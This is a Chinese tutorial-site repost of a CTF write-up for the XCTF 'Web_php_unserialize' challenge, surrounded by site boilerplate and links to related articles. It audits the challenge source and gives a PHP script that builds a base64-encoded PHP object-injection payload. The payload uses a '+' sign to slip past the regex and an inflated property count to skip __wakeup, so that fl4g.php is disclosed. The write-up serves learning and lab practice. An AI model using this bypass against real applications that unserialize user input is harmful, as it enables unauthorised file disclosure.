首页 / PHP / XCTF(Web_php_unserialize)

XCTF(Web_php_unserialize)

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了XCTF(Web_php_unserialize)，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含2375字，纯文字阅读大概需要4分钟。

内容图文

拿到题目，是个这，

XCTF(Web_php_unserialize) - 文章图片

我们来一波代码审计

 1 <?php 
 2 class Demo { 
 3     private $file = 'index.php';
 4     public function __construct($file) { 
 5         $this->file = $file;  //构造函数，对类的变量进行初始化
 6     }
 7     function __destruct() { 
 8         echo @highlight_file($this->file, true); 
 9     }
10 
11     //魔术方法，如果有反序列化的使用，在反序列化之前会先调用这个方法
12     function __wakeup() { 
13         if ($this->file != 'index.php') { 
14             //the secret is in the fl4g.php
15             $this->file = 'index.php'; 
16         } 
17     } 
18 }
19 if (isset($_GET['var'])) { 
20     $var = base64_decode($_GET['var']); 
21 
22     //正则匹配，如果在var变量中存在O/C:数字(O:数字或者C:数字这样的形式})，不区分大小写，就输出stop hacking!否则的话就进行发序列化
23     if (preg_match('/[oc]:\d+:/i', $var)) { 
24         die('stop hacking!'); 
25     } else {
26         @unserialize($var); 
27     } 
28 } else { 
29     highlight_file("index.php"); 
30 } 
31 ?>

审计完成之后，思路就很清晰了，对Demo这个类进行序列化，base64加密之后，赋值给var变量进行get传参就行了在类Demo中有三个方法，一个构造，一个析构，还有就是一个魔术方法，构造函数__construct()在程序执行开始的时候对变量进行赋初值。析构函数__destruct()，在对象所在函数执行完成之后，会自动调用，这里就会高亮显示出文件。在反序列化执行之前，会先执行__wakeup这个魔术方法，所以需要绕过，当成员属性数目大于实际数目时可绕过wakeup方法，正则匹配可以用+号来进行绕过。
写一个序列化的脚本

 1 <?php
 2 class Demo { 
 3     private $file = 'index.php';
 4     public function __construct($file) { 
 5         $this->file = $file; 
 6     }
 7     function __destruct() { 
 8         echo @highlight_file($this->file, true); 
 9     }
10     function __wakeup() { 
11         if ($this->file != 'index.php') { 
12             //the secret is in the fl4g.php
13             $this->file = 'index.php'; 
14         } 
15     } 
16 }
17 
18 $a = new Demo("fl4g.php");
19 echo(serialize($a))."\n";
20 echo base64_encode('O:+4:"Demo":2:{s:10:" Demo file";s:8:"fl4g.php";}')."\n";
21 
22 ?>

这里有个坑，这里的 file 变量为私有变量，所以序列化之后的字符串开头结尾各有一个空白字符（即%00），字符串长度也比实际长度大 2，如果将序列化结果复制到在线的 base64 网站进行编码可能就会丢掉空白字符，所以这里直接在 php 代码里进行编码。类似的还有 protected 类型的变量，序列化之后字符串首部会加上%00*%00

干脆写个python脚本

XCTF(Web_php_unserialize) - 文章图片

注意在python3中，字符串被b''包围，\0表示空格

php中也ok

XCTF(Web_php_unserialize) - 文章图片

内容总结

以上是互联网集市为您收集整理的XCTF(Web_php_unserialize)全部内容，希望文章能够帮你解决XCTF(Web_php_unserialize)所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/630476.html

来源：【匿名】

【上一篇】PHP file_exists() 函数【下一篇】PHP 5 数据对象 (PDO) 抽象层与 Oracle

更多 ►

【XCTF(Web_php_unserialize)】教程文章相关的互联网学习教程文章

php中unserialize返回false的解决方法【代码】

本文实例讲述了php中unserialize返回false的解决方法，分享给大家供大家参考。具体方法如下：php 提供serialize(序列化) 与unserialize(反序列化)方法。使用serialize序列化后，再使用unserialize反序列化就可以获取原来的数据。先来看看如下程序实例： <?php $arr = array( ‘name‘ => ‘fdipzone‘, ‘gender‘ => ‘male‘ ); $str = serialize($arr); //序列化 echo ‘serialize str:‘.$str."\r\n\r\n"; $content = unse...

php函数serialize()与unserialize()【图】

serialize()和unserialize()在php手册上的解释是:serialize — Generates a storable representation of a valueserialize — 产生一个可存储的值的表示unserialize — Creates a PHP value from a stored representationunserialize — 从已存储的表示中创建 PHP 的值实例打印结果原文：http://www.cnblogs.com/-619569179/p/6489664.html

php序列化函数漏洞----unserialize()函数【代码】【图】

unserialize()函数概念 unserialize() 对单一的已序列化的变量进行操作，将其转换回 PHP 的值。返回的是转换之后的值，可为 integer、float、string、array 或 object。如果传递的字符串不可解序列化，则返回 FALSE。与之相对的函数serialize()序列化函数。我们看一个题目题目：天网管理系统，链接： http://ctf5.shiyanbar.com/10/web1/1、进入题目查看网页源码这行提示比较霸气，直接让你判断你的用户名的md5值是不是等于0，这里...

Web_php_unserialize(序列化与反序列化)【代码】

题目题目是这样的很明显是一道 PHP 反序列化的题目，直接来看题目给出的流程首先判断当前是否存在 GET 参数 " var " ，若存在则对其进行 Base64 解码后存入 $var 变量 . 若不存在则输出当前页面源码对 $var 进行一个正则过滤，若通过正则过滤，则对其进行反序列化操作，否则响应提示信息 .题目中给出一个 Demo 类，需要注意一下其中三个魔术方法__wakeup()该方法是PHP反序列化时执行的第一个方法， unserialize()会先检...

php函数serialize()与unserialize()【代码】【图】

serialize()和unserialize()在php手册上的解释是:serialize — Generates a storable representation of a valueserialize — 产生一个可存储的值的表示unserialize — Creates a PHP value from a stored representationunserialize — 从已存储的表示中创建 PHP 的值<?php //声明一个类class dog {var$name;var$age;var$owner;function dog($in_name="unnamed",$in_age="0",$in_owner="unknown") {$this->name = $in_name;$thi...

php中magic_quotes_gpc对unserialize的影响分析

本文实例分析了php中magic_quotes_gpc对unserialize的影响。分享给大家供大家参考。具体如下：magic_quotes_gpc是一个php中一个给单双引号增加一些安全过滤的函数,但此函数对于我们使用unserialize函数时会产生一些影响,下面我们就这个问题与大家看几个实例与解决办法.昨天朋友让我帮他解决下他网站的购物车程序的问题,程序用的是PHPCMS,换空间前是好的,刚换的空间,具体问题是提示成功加入购物车后跳转到购物车页面,购物车里为空.我...

Web_php_unserialize

转载自CSDN，这题确实是一头雾水- -源码：<?php class Demo { private $file = ‘index.php‘; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != ‘index.php‘) { //the secret is in the fl4g.php $this->file = ‘index.php...

直击php中unserialize返回false的解决方法【代码】【图】

本文实例讲述了php中unserialize返回false的解决方法，分享给大家供大家参考。具体方法如下：php 提供serialize(序列化) 与unserialize(反序列化)方法。使用serialize序列化后，再使用unserialize反序列化就可以获取原来的数据。先来看看如下程序实例：<?php $arr = array( name => fdipzone, gender => male ); $str = serialize($arr); //序列化 echo serialize str:.$str."\r\n\r\n"; $content = unserialize($str); // 反序...

浅析PHP中json_encode、json_decode与serialize、unserialize的性能测试【代码】【图】

今天偶然在想，如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据，不知道效率会如何？于是便联想到PHP中的对象怎么样序列化存储性价比最高呢？接着想到了之前同事推荐的JSON编码和解码函数。据他所说，json_encode和json_decode比内置的serialize和unserialize函数要高效。于是我决定动手实验，证实一下同事所说的情况是否属实。实验分别在PHP 5.2.13和PHP 5.3.2环境下进行。用同一个变量，...

实例详解php中serialize()与unserialize()函数

这篇文章主要介绍了php的serialize()函数和unserialize()函数的相关资料,需要的朋友可以参考下php的serialize()函数和unserialize()函数适用情境：serialize()返回字符串，此字符串包含了表示value的字节流，可以存储于任何地方。这有利于存储或传递 PHP 的值，同时不丢失其类型和结构。比较有用的地方就是将数据存入数据库或记录在文件中的时候serialize()可处理处资源类型外所有的类型，也可以序列化对象<?php $array = array()...

phpserialize()与unserialize()的区别

这篇文章主要介绍了php serialize()与unserialize() 的一些区别,需要的朋友可以参考下serialize()和unserialize()在php手册上的解释是:serialize — Generates a storable representation of a valueserialize — 产生一个可存储的值的表示unserialize — Creates a PHP value from a stored representationunserialize — 从已存储的表示中创建 PHP 的值很显然,"a stored representation"的解释翻译成了一个可存储的值后依然很让人...

php中serialize()和unserialize()函数实例详解

php的serialize()函数和unserialize()函数适用情境：serialize()返回字符串，此字符串包含了表示value的字节流，可以存储于任何地方。这有利于存储或传递 PHP 的值，同时不丢失其类型和结构。比较有用的地方就是将数据存入数据库或记录在文件中的时候。本文主要和大家介绍php的serialize()函数和unserialize()函数的相关资料,需要的朋友可以参考下，希望能帮助到大家。serialize()可处理处资源类型外所有的类型，也可以序列化对象<...

剖析函数serialize()和unserialize()的用法

serialize()和unserialize()函数的实例讲解

今天看class.quickskin.PHP代码的时候，看的一个没有见过的函数serialize，大神和小百都问了，也没弄清个头绪，结果一想本地测试一下不就得了，又猪头了一次。。。。其实这样的问题很简单，自己动手一下就解决，很多时候还是我们太懒了。。。。用语言来解释程序往往是很难的，尤其是像我这样的菜菜，很多时候还是看代码来得更容易些。PHP5 手册里是的解释如下，咋一看有点云里雾里的感觉，但是测试之后再看一遍就明白多了。简单说s...

php什么字符会影响到unserialize()的解析？

PHP什么字符会影响到unserialize的解析？回复内容：PHP什么字符会影响到unserialize的解析？楼上正解举个例子，utf8编码下echo serialize(我); //输出: s:3:"我";gbk编码下echo serialize(我); //输出：s:2:"我";所以你永远不能把utf8编码下3字节长的我序列化后在gbk编码下反序列化解析出来我觉得应该是序列化数据时的编码与反序列化时的编码不一致导致，或者你可以贴下错误的语句好分析/\这两会，我遇到过以上就是php什么字符会...

PHP - 技术教程分类

PHP 教程 PHP 简介 PHP 安装 PHP 语法 PHP 变量 PHP echo/print PHP EOF(heredoc) PHP 数据类型 PHP 类型比较 PHP 常量 PHP 字符串 PHP 运算符 PHP If...Else PHP Switch PHP 数组 PHP 数组排序 PHP 超级全局变量 PHP While 循环 PHP For 循环 PHP 函数 PHP 魔术常量 PHP 命名空间 PHP 面向对象 PHP 测验 PHP 表单 PHP 表单验证 PHP 表单 - 必需字段 PHP 完整表单实例 PHP $_GET 变量 PHP $_POST 变量 PHP 多维数组 PHP 日期 PHP 包含 PHP 文件 PHP 文件上传 PHP Cookie PHP Session PHP E-mail PHP Error PHP Exception PHP 过滤器 PHP 7 新特性 PHP MySQL 简介 PHP MySQL 连接 PHP MySQL 创建数据库 PHP MySQL 创建数据表 PHP MySQL 插入数据 PHP MySQL 插入多条数据 PHP MySQL 预处理语句 PHP MySQL 读取数据 PHP MySQL Where PHP MySQL Order By PHP MySQL Update PHP MySQL Delete PHP ODBC AJAX 简介 AJAX PHP AJAX 数据库 AJAX 实时搜索 AJAX 投票 PHP Array PHP Calendar PHP cURL PHP Date PHP Directory PHP Error PHP Filesystem PHP Filter PHP FTP PHP HTTP PHP Mail PHP Math PHP Misc PHP MySQLi PHP PDO PHP String PHP Zip PHP Timezones PHP 图像处理 PHP RESTful PHP PCRE PHP 可用的函数 PHP Composer php 全部

PHP - 最热教程

php如何取出数组的前几个元素 PHP变量什么时候释放 PHP如何实现在数据库随机获取几条记录如何解决php base64解码乱码 php主要用于哪些领域 Laravel 批量插入(insert)数据六款国内优秀免费wordpress主题推荐 React如何从后端获取数据并渲染到前端？纯PHP实现定时器任务（Timer），php实现...php该如何安装pdo_mysql扩展

首页 / PHP / XCTF(Web_php_unserialize)

XCTF(Web_php_unserialize)

内容导读

内容图文

内容总结

内容备注

内容手机端

【XCTF(Web_php_unserialize)】教程文章相关的互联网学习教程文章

php中unserialize返回false的解决方法【代码】

php函数serialize()与unserialize()【图】

php序列化函数漏洞----unserialize()函数【代码】【图】

Web_php_unserialize(序列化与反序列化)【代码】

php函数serialize()与unserialize()【代码】【图】

php中magic_quotes_gpc对unserialize的影响分析

Web_php_unserialize

直击php中unserialize返回false的解决方法【代码】【图】

浅析PHP中json_encode、json_decode与serialize、unserialize的性能测试【代码】【图】

实例详解php中serialize()与unserialize()函数

phpserialize()与unserialize()的区别

php中serialize()和unserialize()函数实例详解

剖析函数serialize()和unserialize()的用法

serialize()和unserialize()函数的实例讲解

php什么字符会影响到unserialize()的解析？

PHP - 相关标签

WEB - 相关标签

PHP - 技术教程分类

PHP - 最新教程

PHP - 最热教程